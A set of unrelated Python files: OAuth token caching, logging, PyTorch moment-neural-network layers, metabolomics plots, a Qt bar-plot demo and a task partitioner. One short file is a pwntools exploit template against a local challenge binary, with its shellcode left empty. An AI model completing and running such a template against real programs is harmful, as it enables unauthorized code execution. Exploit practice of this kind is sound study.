if self._get_client_id(client_id=client_id) is None:
return None
else:
return self._get_client_id(client_id=client_id).popitem()
def _modify_token_cache_data(self, client_id, data:dict):
data.update({'client_id': client_id,
'last_mod_time': int(datetime.utcnow().timestamp())
}) # forcing these two fields
lock = FileLock(f'{self._token_file}.lock')
with open(self._token_file, 'r') as f:
existing_data = json.load(f)
try:
lock.acquire(timeout=2)
if self._get_client_id(client_id=client_id) is None:
# looks to be a net new client id, appending it
with open(self._token_file, 'w+') as f:
num_keys = len(existing_data.keys())
existing_data[num_keys + 1] = data
f.seek(0)
json.dump(existing_data, f)
else:
cache_id, client_dict = self._get_client_id(client_id=client_id).popitem()
existing_data[cache_id].update(**data)
with open(self._token_file, 'w+') as f:
f.seek(0)
json.dump(existing_data, f)
existing_data[cache_id].update(**data)
except TimeoutError as e:
raise(e)
finally:
lock.release()
@classmethod
def default_qs_params(klass, endpoint_type:str):
if endpoint_type.lower()[0:4] == 'auth':
qs_dict = {
'response_type': 'code',
'client_id': '{client_id}',
'redirect_uri': '{redirect_url}',
'scope': None,
'state': '{state}'
}
elif endpoint_type.lower()[0:4] == 'acce':
qs_dict = {
'grant_type': 'authorization_code',
'client_id': '{client_id}',
'code': '{access_code}',
'redirect_uri': '{redirect_url}',
'scope': None,
'access_type': None
}
elif endpoint_type.lower()[0:4] == 'refr':
qs_dict = {
'grant_type': 'refresh_token',
'client_id': '{client_id}',
'refresh_token': '{refresh_token}',
'scope': None,
}
else:
raise ValueError("Unexpected argument 1:{endpoint_type}, require one of ('authorization', 'access' or 'refresh')")
return qs_dict
def add_oauth_client(self, client_id:str, auth_endpoint:str, token_endpoint:str, service_name:str=None, redirect_url=settings.OAUTH.REDIRECT_URL):
"""
This is setting up the client_id for an oauth call. I want this to be extensible so I'm adding
the ability to provide a service_name for segmenting.
Note, no data pushed to redis here, this is all local file cache stuff
TODO: the endpoint args here are a bit semantic sensitive, add data checks upfront or make it simpler
"""
assert self._token_file is not None, "No local token file storage set, this is required"
data = {
'client_id': client_id,
'auth_endpoint': {**auth_endpoint},
'token_endpoint': {**token_endpoint},
'redirect_url': redirect_url,
'service_name': service_name,
'add_time': int(datetime.utcnow().timestamp()),
'auth_code_set': False,
'refresh_token_ttl': None,
'acess_token_ttl': None,
}
self._modify_token_cache_data(client_id, data)
return self._get_client_id(client_id)
def is_auth_code_set(self, client_id):
if self._get_client_id(client_id) is not None:
cache_id, client_dict = self._get_client_id(client_id).popitem()
try:
return client_dict['auth_code_set']
except:
return "DATA FORMAT ISSUE - no auth_code_set in token cache"
else:
return None
def client_token_info(self, client_id):
if self._get_client_id(client_id) is not None:
cache_id, client_dict = self._get_client_id(client_id).popitem()
try:
client_dict.update({'refresh_token_ttl': self._redis.ttl(f'{self._token_refresh_prepend}:_{client_id}'),
'acess_token_ttl': self._redis.ttl(f'{self._token_access_prepend}:_{client_id}')})
except ConnectionError as e:
client_dict.update({'refresh_token_ttl': 'NO MESSAGE BROKER CONN',
'acess_token_ttl': 'NO MESSAGE BROKER CONN'})
return client_dict
else:
return None
def get_qs_params(self, client_id):
if self._get_client_id(client_id=client_id) is not None:
cache_id, client_data = self._get_token_cache_data(client_id)
try:
return client_data['qs_params']
except:
return None
def get_access_code(self, client_id):
if self._get_client_id(client_id=client_id) is not None:
val = self._redis.get(f'{self._access_code_prepend}:_{client_id}')
self._last = val
self._redis.delete(f'{self._access_code_prepend}:_{client_id}')
self._modify_token_cache_data(client_id, {'auth_code_set': False})
return val
else:
logging.info(f"No client id found that matches requested: {client_id}")
return None
def set_access_code(self, client_id, access_code):
if self._get_client_id(client_id=client_id) is not None:
self._redis.set(f'{self._access_code_prepend}:_{client_id}', access_code, ex=None)
self._modify_token_cache_data(client_id, {'auth_code_set': True})
return True
else:
logging.info(f"No client id found that matches requested: {client_id}")
return False
def get_refresh_token(self, client_id):
if self._get_client_id(client_id=client_id) is not None:
return self._redis.get(f'{self._token_refresh_prepend}:_{client_id}')
else:
logging.info(f"No client id found that matches requested: {client_id}")
return None
def set_refresh_token(self, client_id, token, ttl:int):
if self._get_client_id(client_id=client_id) is not None:
self._redis.set(f'{self._token_refresh_prepend}:_{client_id}', token, ex=ttl)
return 1
else:
logging.info(f"No client id found that matches requested: {client_id}")
return None
def get_access_token(self, client_id):
if self._get_client_id(client_id=client_id) is not None:
return self._redis.get(f'{self._token_access_prepend}:_{client_id}')
else:
logging.info(f"No client id found that matches requested: {client_id}")
return None
def set_access_token(self, client_id, token, ttl:int):
if self._get_client_id(client_id=client_id) is not None:
self._redis.set(f'{self._token_access_prepend}:_{client_id}', token, ttl)
return 1
else:
logging.info(f"No client id found that matches requested: {client_id}")
return None
def redis_key_name(self, key_type:str, client_id:str):
if key_type == "access_code":
return f'{self._access_code_prepend}:_{client_id}'
elif key_type == "token_refresh":
return f'{self._token_refresh_prepend}:_{client_id}'
elif key_type == "token_access":
return f'{self._token_access_prepend}:_{client_id}'
else:
raise ValueError(f'Unknown key_type "{key_type}", expected ["access_code", "token_refresh", "token_access"]')
@property
def _list_clients(self, ):
try:
with open(self._token_file, 'r') as f:
data = json.load(f)
except FileNotFoundError as e:
data = {}
finally:
return data
@classmethod
def list_service_names(klass, ):
my_obj = klass()
client_info = my_obj._list_clients
service_name_list = [ ]
for k, v in client_info.items():
if v['service_name'] not in service_name_list:
service_name_list.append(v['service_name'])
return service_name_list
def _get_client_id(self, client_id, ):
try:
with open(self._token_file, 'r') as f:
data = json.load(f)
return_data = None
for key, val in data.items():
if val['client_id'] == client_id:
return_data = {key: val}
break
except FileNotFoundError as e:
import os
with open(self._token_file, 'a+') as f:
json.dump({}, f)
os.chmod(self._token_file, 0o600)
return_data = None
finally:
return return_data
def _clear_file_cache(self, ):
try:
import os
with open(self._token_file, 'w+') as f:
json.dump({}, f)
os.chmod(self._token_file, 0o600)
finally:
return None
|
import logging
import os
import sys
from collections import defaultdict
# Configure Logger
Log = None
Cache = defaultdict(lambda: list())
CacheOrder = list()
def log(msg, level='debug'):
if Log is None:
return
if level == 'info':
Log.info(msg)
elif level == 'moreinfo':
Log.log(15, msg)
elif level == 'debug':
Log.debug(msg)
else:
Log.log(level, msg)
def logStartPrep(lapFrac):
msg = '=' * (50)
msg = msg + ' lap %.2f Target Selection' % (lapFrac)
log(msg, 'moreinfo')
def logStartMove(lapFrac, moveID, nMoves):
msg = '=' * (50)
msg = msg + ' lap %.2f %d/%d' % (lapFrac, moveID, nMoves)
log(msg, 'moreinfo')
def logPhase(title):
title = '.' * (50 - len(title)) + ' %s' % (title)
log(title, 'debug')
def logPosVector(vec, fmt='%8.1f', Nmax=10, label='', level='debug'):
if Log is None:
return
vstr = ' '.join([fmt % (x) for x in vec[:Nmax]])
if len(label) > 0:
log(vstr + " | " + label, level)
else:
log(vstr, level)
def logProbVector(vec, fmt='%8.4f', Nmax=10, level='debug'):
if Log is None:
return
vstr = ' '.join([fmt % (x) for x in vec[:Nmax]])
log(vstr, level)
# Advanced caching
###########################################################
def addToCache(cID, msg):
if cID not in Cache:
CacheOrder.append(cID)
Cache[cID].append(msg)
def writeNextCacheToLog():
cID = CacheOrder.pop(0)
for line in Cache[cID]:
log(line)
def writePlanToLog(Plan):
for line in Plan['log']:
log(line)
# Configuration
###########################################################
def configure(taskoutpath, doSaveToDisk=0, doWriteStdOut=0):
global Log
Log = logging.getLogger('birthmove')
Log.setLevel(logging.DEBUG)
Log.handlers = [] # remove pre-existing handlers!
formatter = logging.Formatter('%(message)s')
# Config logger to save transcript of log messages to plain-text file
if doSaveToDisk:
# birth-vtranscript.txt logs everything
fh = logging.FileHandler(
os.path.join(
taskoutpath,
"birth-vtranscript.txt"))
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
Log.addHandler(fh)
# birth-transcript.txt logs high-level messages
fh = logging.FileHandler(
os.path.join(
taskoutpath,
"birth-transcript.txt"))
fh.setLevel(logging.DEBUG + 1)
fh.setFormatter(formatter)
Log.addHandler(fh)
# Config logger that can write to stdout
if doWriteStdOut:
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
ch.setFormatter(formatter)
Log.addHandler(ch)
# Config null logger, avoids error messages about no handler existing
if not doSaveToDisk and not doWriteStdOut:
Log.addHandler(logging.NullHandler())
|
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 3 14:49:43 2020
@author: zzc14
"""
import torch
from Mnn_Core.mnn_utils import *
from torch import Tensor
from torch.nn.parameter import Parameter
import torch.nn.functional as F
from torch.nn import init
from Mnn_Core.fast_dawson import *
torch.set_default_tensor_type(torch.DoubleTensor)
mnn_core_func = Mnn_Core_Func()
class Mnn_Linear_without_Corr(torch.nn.Module):
__constants__ = ['in_features', 'out_features']
in_features: int
out_features: int
weight: Tensor
def __init__(self, in_features: int, out_features: int, bias: bool = False) -> None:
super(Mnn_Linear_without_Corr, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = Parameter(torch.Tensor(out_features, in_features))
if bias:
self.bias = Parameter(torch.Tensor(out_features))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self) -> None:
init.kaiming_uniform_(self.weight, a=np.sqrt(15))
if self.bias is not None:
fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)
bound = 1 / np.sqrt(fan_in)
init.uniform_(self.bias, -bound, bound)
def forward(self, input1: Tensor, input2: Tensor):
ratio = mnn_core_func.get_ratio()
# degree = mnn_core_func.get_degree()
out1 = F.linear(input1, self.weight, self.bias)*(1 - ratio)
out2 = F.linear(torch.pow(input2, 2), torch.pow(self.weight, 2), self.bias)*(1+np.power(ratio, 2))
out2 = torch.sqrt(out2)
return out1, out2
def extra_repr(self) -> str:
return 'in_features={}, out_features={}, bias={}'.format(
self.in_features, self.out_features, self.bias is not None
)
class Mnn_Linear_Corr(torch.nn.Module):
__constants__ = ['in_features', 'out_features']
in_features: int
out_features: int
weight: Tensor
def __init__(self, in_features: int, out_features: int, bias: bool = False) -> None:
super(Mnn_Linear_Corr, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = Parameter(torch.Tensor(out_features, in_features))
if bias:
self.bias = Parameter(torch.Tensor(out_features))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self) -> None:
init.kaiming_uniform_(self.weight, a=np.sqrt(5))
if self.bias is not None:
fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)
bound = 1 / np.sqrt(fan_in)
init.uniform_(self.bias, -bound, bound)
def forward(self, mean_in: Tensor, std_in, corr_in: Tensor):
# ratio not used for std and corr
ratio = mnn_core_func.get_ratio()
mean_out = F.linear(mean_in, self.weight, self.bias) * (1 - ratio)
# Use corr_in and std to compute the covariance matrix
if std_in.dim() == 1:
temp_std_in = std_in.view(1, -1)
temp_std_in = torch.mm(temp_std_in.transpose(1, 0), temp_std_in)
cov_in = torch.mul(temp_std_in, corr_in)
else:
temp_std_in = std_in.view(std_in.size()[0], 1, -1)
temp_std_in = torch.bmm(temp_std_in.transpose(-2, -1), temp_std_in)
# element-wise mul
cov_in = torch.mul(temp_std_in, corr_in)
# cov_out = W C W^T
cov_out = torch.matmul(self.weight, torch.matmul(cov_in, self.weight.transpose(1, 0)))
if self.bias is not None:
bias = self.bias.view(1, -1)
bias = torch.mm(bias.transpose(1, 0), bias)
cov_out += bias
if cov_out.dim() == 2: # one sample case
var_out = torch.diagonal(cov_out)
# prevent negative value
std_out = torch.sqrt(torch.abs(var_out))
temp_std_out = std_out.view(1, -1)
temp_std_out = torch.mm(temp_std_out.transpose(1, 0), temp_std_out)
corr_out = torch.div(cov_out, temp_std_out)
else:
var_out = torch.diagonal(cov_out, dim1=-2, dim2=-1)
std_out = torch.sqrt(torch.abs(var_out))
temp_std_out = std_out.view(std_out.size()[0], 1, -1)
temp_std_out = torch.bmm(temp_std_out.transpose(-2, -1), temp_std_out)
# element-wise div
corr_out = torch.div(cov_out, temp_std_out)
return mean_out, std_out, corr_out
def extra_repr(self) -> str:
return 'in_features={}, out_features={}, bias={}'.format(
self.in_features, self.out_features, self.bias is not None
)
class Mnn_Activate_Mean(torch.autograd.Function):
@staticmethod
def forward(ctx, mean_in, std_in):
clone_mean = mean_in.clone().detach().numpy()
clone_std = std_in.clone().detach().numpy()
shape = clone_mean.shape
# Todo Should remove flatten op to save time
clone_mean = clone_mean.flatten()
clone_std = clone_std.flatten()
mean_out = mnn_core_func.forward_fast_mean(clone_mean, clone_std)
# Todo Should remove flatten op to save time
mean_out = torch.from_numpy(mean_out.reshape(shape))
ctx.save_for_backward(mean_in, std_in, mean_out)
return mean_out
@staticmethod
def backward(ctx, grad_output):
mean_in, std_in, mean_out = ctx.saved_tensors
clone_std_in = std_in.clone().detach().numpy()
clone_mean_out = mean_out.clone().detach().numpy()
clone_mean_in = mean_in.clone().detach().numpy()
# Todo Should remove flatten op to save time
shape = clone_std_in.shape
clone_mean_in = clone_mean_in.flatten()
clone_std_in = clone_std_in.flatten()
clone_mean_out = clone_mean_out.flatten()
grad_mean, grad_std = mnn_core_func.backward_fast_mean(clone_mean_in, clone_std_in, clone_mean_out)
# Todo Should remove flatten op to save time
grad_mean = torch.from_numpy(grad_mean.reshape(shape))
grad_std = torch.from_numpy(grad_std.reshape(shape))
grad_mean = torch.mul(grad_output, grad_mean)
grad_std = torch.mul(grad_output, grad_std)
return grad_mean, grad_std
class Mnn_Activate_Std(torch.autograd.Function):
@staticmethod
def forward(ctx, mean_in, std_in, mean_out):
clone_mean = mean_in.clone().detach().numpy()
clone_std = std_in.clone().detach().numpy()
clone_mean_out = mean_out.clone().detach().numpy()
shape = clone_mean.shape
# Todo Should remove flatten op to save time
clone_mean = clone_mean.flatten()
clone_std = clone_std.flatten()
clone_mean_out = clone_mean_out.flatten()
std_out= mnn_core_func.forward_fast_std(clone_mean, clone_std, clone_mean_out)
# Todo Should remove flatten op to save time
std_out = torch.from_numpy(std_out.reshape(shape))
ctx.save_for_backward(mean_in, std_in, mean_out, std_out)
return std_out
@staticmethod
def backward(ctx, grad_output):
mean_in, std_in, mean_out, std_out = ctx.saved_tensors
clone_mean_in = mean_in.clone().detach().numpy()
clone_std_in = std_in.clone().detach().numpy()
clone_mean_out = mean_out.clone().detach().numpy()
clone_std_out = std_out.clone().detach().numpy()
# Todo Should remove flatten op to save time
shape = clone_std_in.shape
clone_mean_in = clone_mean_in.flatten()
clone_std_in = clone_std_in.flatten()
clone_mean_out = clone_mean_out.flatten()
clone_std_out = clone_std_out.flatten()
std_grad_mean, std_grad_std = mnn_core_func.backward_fast_std(clone_mean_in, clone_std_in, clone_mean_out,
clone_std_out)
# Todo Should remove flatten op to save time
std_grad_mean = torch.from_numpy(std_grad_mean.reshape(shape))
std_grad_std = torch.from_numpy(std_grad_std.reshape(shape))
std_grad_mean = torch.mul(grad_output, std_grad_mean)
std_grad_std = torch.mul(grad_output, std_grad_std)
grad_mean_out = torch.zeros_like(std_grad_mean)
return std_grad_mean, std_grad_std, grad_mean_out
class Mnn_Activate_Corr(torch.autograd.Function):
@staticmethod
def forward(ctx, corr_in, mean_in, std_in, mean_out, std_out):
"""
corr_in: The covariance matrix that passed the Mnn_Linear_Cov layer
mean_bn_in: the mean vector that passed the batch normalization layer
std_bn_in: the std vector that passed the batch normalization layer
The following variable should pass by using clone().detach() function (require no gradient)
mean_out : the mean vector that is activated by Mnn_Activate_Mean
std_out : the std vector that is activated by Mnn_Activate_Std
"""
# Compute the chi function
clone_mean_in = mean_in.clone().detach().numpy()
clone_std_in = std_in.clone().detach().numpy()
clone_mean_out = mean_out.clone().detach().numpy()
clone_std_out = std_out.clone().detach().numpy()
shape = clone_mean_in.shape
clone_mean_in = clone_mean_in.flatten()
clone_mean_out = clone_mean_out.flatten()
clone_std_in = clone_std_in.flatten()
clone_std_out = clone_std_out.flatten()
func_chi = mnn_core_func.forward_fast_chi(clone_mean_in, clone_std_in, clone_mean_out, clone_std_out)
# func_chi = np.nan_to_num(func_chi)
func_chi = torch.from_numpy(func_chi.reshape(shape))
# Compute the Cov of next layer
# One sample case
if func_chi.dim() == 1:
temp_func_chi = func_chi.view(1, -1)
temp_func_chi = torch.mm(temp_func_chi.transpose(1, 0), temp_func_chi)
# Multi sample case
else:
temp_func_chi = func_chi.view(func_chi.size()[0], 1, func_chi.size()[1])
temp_func_chi = torch.bmm(temp_func_chi.transpose(-1, -2), temp_func_chi)
corr_out = torch.mul(corr_in, temp_func_chi)
# replace the diagonal elements with 1
if corr_out.dim() == 2:
for i in range(corr_out.size()[0]):
corr_out[i, i] = 1.
else:
for i in range(corr_out.size()[0]):
for j in range(corr_out.size()[1]):
corr_out[i, j, j] = 1.0
ctx.save_for_backward(corr_in, mean_in, std_in, mean_out, func_chi)
return corr_out
# require the gradient of corr_in, mean_bn_in, std_bn_in
@staticmethod
def backward(ctx, grad_out):
corr_in, mean_in, std_in, mean_out, func_chi = ctx.saved_tensors
clone_mean_in = mean_in.clone().detach().numpy()
clone_std_in = std_in.clone().detach().numpy()
clone_mean_out = mean_out.clone().detach().numpy()
clone_func_chi = func_chi.clone().detach().numpy()
shape = clone_std_in.shape
# Todo unnecessary flatten operation, need to be optimised
clone_mean_in = clone_mean_in.flatten()
clone_std_in = clone_std_in.flatten()
clone_mean_out = clone_mean_out.flatten()
clone_func_chi = clone_func_chi.flatten()
chi_grad_mean, chi_grad_std = mnn_core_func.backward_fast_chi(clone_mean_in, clone_std_in,
clone_mean_out, clone_func_chi)
chi_grad_mean = torch.from_numpy(chi_grad_mean.reshape(shape))
chi_grad_std = torch.from_numpy(chi_grad_std.reshape(shape))
temp_corr_grad = torch.mul(grad_out, corr_in)
if temp_corr_grad.dim() == 2: # one sample case
temp_corr_grad = torch.mm(func_chi.view(1, -1), temp_corr_grad)
else:
temp_corr_grad = torch.bmm(func_chi.view(func_chi.size()[0], 1, -1), temp_corr_grad)
# reshape the size from (batch, 1, feature) to (batch, feature)
temp_corr_grad = 2 * temp_corr_grad.view(temp_corr_grad.size()[0], -1)
corr_grad_mean = chi_grad_mean * temp_corr_grad
corr_grad_std = chi_grad_std * temp_corr_grad
if func_chi.dim() == 1:
temp_func_chi = func_chi.view(1, -1)
chi_matrix = torch.mm(temp_func_chi.transpose(1, 0), temp_func_chi)
else:
temp_func_chi = func_chi.view(func_chi.size()[0], 1, -1)
chi_matrix = torch.bmm(temp_func_chi.transpose(-2, -1), temp_func_chi)
corr_grad_corr = 2 * torch.mul(chi_matrix, grad_out)
# set the diagonal element of corr_grad_corr to 0
if corr_grad_corr.dim() != 2:
for i in range(corr_grad_corr.size()[0]):
for j in range(corr_grad_corr.size()[1]):
corr_grad_corr[i, j, j] = 0.0
else:
for i in range(corr_grad_corr.size()[0]):
corr_grad_corr[i, i] = 0.0
grad_mean_out = torch.zeros_like(mean_out)
grad_std_out = torch.zeros_like(mean_out)
return corr_grad_corr, corr_grad_mean, corr_grad_std, grad_mean_out, grad_std_out
if __name__ == "__main__":
neuron = 5
batch = 1
u = torch.rand(batch, neuron)
u.requires_grad = True
s = torch.abs(u.clone())
rho = torch.diag(torch.ones(neuron))
u1 = Mnn_Activate_Mean.apply(u, s)
s1 = Mnn_Activate_Std.apply(u, s, u1)
r1 = Mnn_Activate_Corr.apply(rho, u, s, u1, s1)
print(u1, s1, r1, sep="\n")
print(torch.var(u1))
|
# Import packages that are needed
import pandas as pd # tested with version 0.22.0
import matplotlib as mpl
import matplotlib.pyplot as plt # tested with version 2.1.2
import seaborn as sns # tested with version 0.8.1
import matplotlib.gridspec
from .summary_stats import get_merged
mpl.use("Agg")
ALPHA = 0.1 # nominally significant p-value threshold
WILCOXON_STAT = "Wilcoxon rank-sum stat" # Set up column names
WILCOXON_P_VALUE = "Wilcoxon rank-sum p-value"
# Set the color palette for the bar plot, where significant = red = C2 and Not significant = C0 = blue
PALETTE = {"Bonferoni": "C3", "Nominal": "C0"}
COMBO_FIG_SIZE = (15, 6) # (25, 10)
BARPLOT_FIG_SIZE = (8, 4.3) # (15, 8)
def process_data(locations):
if locations["data"]["resource"]["format"].lower() == "gct":
measure1 = "before"
measure2 = "after"
elif locations["data"]["resource"]["format"].lower() == "csv":
measure1 = "urine"
measure2 = "serum"
summaryStats = pd.read_csv(locations["summary"]["path"], sep=",")
# Get significant values and measure2/measure1 dataframes
summaryStats_significant = summaryStats.iloc[
summaryStats[WILCOXON_P_VALUE]
.where(summaryStats[WILCOXON_P_VALUE] < ALPHA)
.dropna()
.index
]
# Separate measure1 and measure2 samples, sort by t-test statistic, and set the significance of each metabolite
summaryStats_significant_measure1 = summaryStats_significant[
summaryStats_significant["Sample Type"].str.match(measure1)
]
summaryStats_significant_measure1 = summaryStats_significant_measure1.sort_values(
by=WILCOXON_STAT
)
summaryStats_significant_measure1["Significance"] = "Nominal"
summaryStats_significant_measure1.loc[
summaryStats_significant_measure1[WILCOXON_P_VALUE]
< (0.05 / len(summaryStats.index)),
"Significance",
] = "Bonferoni" # These are Bonferroni significant
summaryStats_significant_measure2 = summaryStats_significant[
summaryStats_significant["Sample Type"].str.match(measure2)
]
summaryStats_significant_measure2 = summaryStats_significant_measure2.sort_values(
by=WILCOXON_STAT
)
summaryStats_significant_measure2["Significance"] = "Nominal"
summaryStats_significant_measure2.loc[
summaryStats_significant_measure2[WILCOXON_P_VALUE]
< (0.05 / len(summaryStats.index)),
"Significance",
] = "Bonferoni"
merged, droppable, case, control = get_merged(locations)
# Remove metabolites that contain at least 1 NA value
naMolecules = []
for col in merged:
if merged.loc[:, col].isna().sum() > 0:
naMolecules.append(col)
merged_naRemoved = merged.drop(naMolecules, axis=1)
csvdropColumns = droppable + [
"Sample Name",
"Extraction Protocol",
"Extraction Method",
"Spectrum Protocol",
"Status",
"Sample Type",
]
dropColumns = []
for drop in csvdropColumns:
if drop in merged_naRemoved.columns.values:
dropColumns.append(drop)
merged_naRemoved = merged_naRemoved.drop(dropColumns, axis=1)
# Rename the row index of the dataframe to the sample name
sampleNames = merged["Sample Name"].values.tolist()
sampleDict = {}
for k in range(len(merged_naRemoved.index.values.tolist())):
sampleDict[merged_naRemoved.index.values.tolist()[k]] = sampleNames[k]
merged_naRemoved.rename(index=sampleDict, inplace=True)
measure1_df = merged[merged["Sample Type"] == measure1]
measure1_significant = measure1_df[summaryStats_significant_measure1["Molecule"]]
# Remove metabolites that contain at least 1 NA value
naMolecules = []
for col in measure1_significant.columns:
if measure1_significant.loc[:, col].isna().sum() > 0:
naMolecules.append(col)
measure1_significant = measure1_significant.drop(naMolecules, axis=1)
# Rename the row index of the dataframe to the sample name
sampleNames = measure1_df["Sample Name"].values.tolist()
sampleDict = {}
for k in range(len(measure1_significant.index.values.tolist())):
sampleDict[measure1_significant.index.values.tolist()[k]] = sampleNames[k]
measure1_significant.rename(index=sampleDict, inplace=True)
# Separate out the measure2 samples and filter those that are nominally significant (as defined above)
measure2_df = merged[merged["Sample Type"] == measure2]
measure2_significant = measure2_df[summaryStats_significant_measure2["Molecule"]]
# Remove metabolites that contain at least 1 NA value
naMolecules = []
for col in measure2_significant.columns:
if measure2_significant.loc[:, col].isna().sum() > 0:
naMolecules.append(col)
measure2_significant = measure2_significant.drop(naMolecules, axis=1)
# Rename the row index of the dataframe to the sample name
sampleNames = measure2_df["Sample Name"].values.tolist()
sampleDict = {}
for k in range(len(measure2_significant.index.values.tolist())):
sampleDict[measure2_significant.index.values.tolist()[k]] = sampleNames[k]
measure2_significant.rename(index=sampleDict, inplace=True)
return {
"summ_stats_measure1": summaryStats_significant_measure1,
"summ_stats_measure2": summaryStats_significant_measure2,
"heatmap_all_samples": merged_naRemoved,
"heatmap_measure1_significant": measure1_significant,
"heatmap_measure2_significant": measure2_significant,
}
def create_bar_plots(
x,
y,
title,
figsize=BARPLOT_FIG_SIZE,
hue=None,
palette=PALETTE,
save_path=None,
font_scale=1,
ax=None,
):
plt.figure(figsize=figsize)
sns.set(font_scale=font_scale)
sns.barplot(y=y, x=x, hue=hue, palette=PALETTE, dodge=False, ax=ax)
plt.legend(loc="upper right")
plt.title(title)
def create_plot(
cluster_data,
barplot_data,
super_title,
heatmap_title,
barplot_title,
gridspec_dict,
fig_size,
save_path,
combo_plot=False,
font_scale=1,
):
sns.set(font_scale=font_scale)
plot = sns.clustermap(cluster_data, figsize=fig_size)
if super_title:
plot.fig.suptitle(super_title)
plot.ax_heatmap.set_title(heatmap_title, pad=45)
plot.ax_heatmap.xaxis.set_ticklabels(
ticklabels=plot.ax_heatmap.xaxis.get_ticklabels(), rotation=90
)
if combo_plot:
plot.gs.update(
left=gridspec_dict["clustermap_left"],
right=gridspec_dict["clustermap_right"],
)
gs2 = matplotlib.gridspec.GridSpec(
1,
1,
left=gridspec_dict["barplot_left"],
right=gridspec_dict["barplot_right"],
)
ax2 = plot.fig.add_subplot(gs2[0])
x = barplot_data["Molecule"].values
y = barplot_data[WILCOXON_STAT].values
hue = barplot_data["Significance"].values
create_bar_plots(
y, x, hue=hue, title=barplot_title, font_scale=font_scale, ax=ax2
)
ax2.set_title(barplot_title)
ax2.set_xlabel(WILCOXON_STAT)
ax2.set_ylabel("Molecule")
ax2.legend(title="Significance")
plot.savefig(save_path, dpi=300)
return save_path.rsplit("/", 1)[1]
def graphics(locations):
plot_data = process_data(locations)
summ_stats_measure1 = plot_data.get("summ_stats_measure1")
summ_stats_measure2 = plot_data.get("summ_stats_measure2")
heatmap_all_samples = plot_data.get("heatmap_all_samples")
heatmap_measure1_significant = plot_data.get("heatmap_measure1_significant")
heatmap_measure2_significant = plot_data.get("heatmap_measure2_significant")
plot_attrs = {
"title": {
"cluster all": "Clustermap - All Samples",
"cluster measure2": "Clustermap - measure2 Samples",
"cluster measure1": "Clustermap - measure1 Samples",
"barplot measure2": "Nominally Significant Metabolites (p < 0.1) - measure2",
"barplot measure1": "Nominally Significant Metabolites (p < 0.1) - measure1",
"super measure2": "Nominally Significant Metabolites and measure2 Clustermap",
"super measure1": "Nominally Significant Metabolites and measure1 Clustermap",
},
"filepath": {
"cluster all": "/tmp/heatmap_all.png",
"combo measure1": "/tmp/measure1_heatmap_stat_sig_metabolites.png",
"combo measure2": "/tmp/measure2_heatmap_stat_sig_metabolites.png",
},
}
save_path = plot_attrs["filepath"]["cluster all"]
title = plot_attrs["title"]["cluster all"]
created_files = []
heatmap_all_plotname = create_plot(
heatmap_all_samples,
None,
super_title=None,
heatmap_title=title,
barplot_title=None,
gridspec_dict=None,
fig_size=BARPLOT_FIG_SIZE,
save_path=save_path,
)
created_files.append(heatmap_all_plotname)
positions = {
"barplot_left": 0.0,
"barplot_right": 0.45,
"clustermap_left": 0.50,
"clustermap_right": 1.0,
}
save_path = plot_attrs["filepath"]["combo measure2"]
super_title = plot_attrs["title"]["super measure2"]
cluster_title = plot_attrs["title"]["cluster measure2"]
barplot_title = plot_attrs["title"]["barplot measure2"]
combo_measure2 = create_plot(
heatmap_measure2_significant,
summ_stats_measure2,
super_title=super_title,
heatmap_title=cluster_title,
barplot_title=barplot_title,
gridspec_dict=positions,
fig_size=COMBO_FIG_SIZE,
save_path=save_path,
combo_plot=True,
)
created_files.append(combo_measure2)
save_path = plot_attrs["filepath"]["combo measure1"]
super_title = plot_attrs["title"]["super measure1"]
cluster_title = plot_attrs["title"]["cluster measure1"]
barplot_title = plot_attrs["title"]["barplot measure1"]
combo_measure1 = create_plot(
heatmap_measure1_significant,
summ_stats_measure1,
super_title=super_title,
heatmap_title=cluster_title,
barplot_title=barplot_title,
gridspec_dict=positions,
fig_size=COMBO_FIG_SIZE,
save_path=save_path,
combo_plot=True,
)
created_files.append(combo_measure1)
return created_files
|
from pwn import *
context.arch = 'amd64'
p = process("./filters_isprint")
shellcode = b""
print(shellcode)
p.send(shellcode)
p.interactive() |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
from qtplotlib.barplot import QBarPlot
from PyQt5.QtWidgets import QApplication
if __name__ == '__main__':
app = QApplication(sys.argv)
widget = QBarPlot()
#widget.data = (10, 20, 30, 5, 15)
widget.data = (8, None, 7, 5, -5, 6)
widget.data_color = ("green", None, "yellow", None, "red", "yellow")
widget.title = "Hello"
widget.hlines = (1, -2, 10)
widget.ymin = -2
widget.show()
# The mainloop of the application. The event handling starts from this point.
# The exec_() method has an underscore. It is because the exec is a Python keyword. And thus, exec_() was used instead.
exit_code = app.exec_()
# The sys.exit() method ensures a clean exit.
# The environment will be informed, how the application ended.
sys.exit(exit_code)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import subprocess
import re
class Task(object):
tasknum = 0
processor = 0
utilization = 0
def make_task(tasknum, utilization):
task = Task()
task.tasknum = tasknum
task.utilization = utilization
task.processor = 0
return task
def parition_ffd(procs, utilizations):
"""Constructs an FFD model."""
bins = []
for i in range(procs):
bins.append(0)
taskset = []
for i in range(len(utilizations)):
taskset.append(make_task(i, utilizations[i]))
taskset.sort(key=lambda x: x.utilization, reverse=True)
for task in taskset:
for i in range(len(bins)):
if bins[i] + task.utilization <= 1:
bins[i] += task.utilization
task.processor = i
break
print(bins)
taskset.sort(key=lambda x: x.tasknum)
for i in range(procs):
print("Processor " + str(i) + ":", end=" ")
for task in taskset:
if task.processor == i:
print(" J" + str(task.tasknum), end=" ")
print()
def main(args):
"""Main."""
print('Partitioning {} tasks on {} processors.'.format(len(args.utilizations), args.procs))
# Basic error checking
for utilization in args.utilizations:
if utilization > 1:
print('Error: Cannot have a task with utilization greater than 1!')
return
parition_ffd(args.procs, args.utilizations)
if __name__ == "__main__":
PARSER = argparse.ArgumentParser(description='Generates a process partion scheme given a set'
'tasks and number of processors')
PARSER.add_argument('--procs', dest='procs', action='store',
default=4, type=int, help='Number of processors')
PARSER.add_argument('utilizations', metavar='N', type=float, nargs='+',
help='A task utilization')
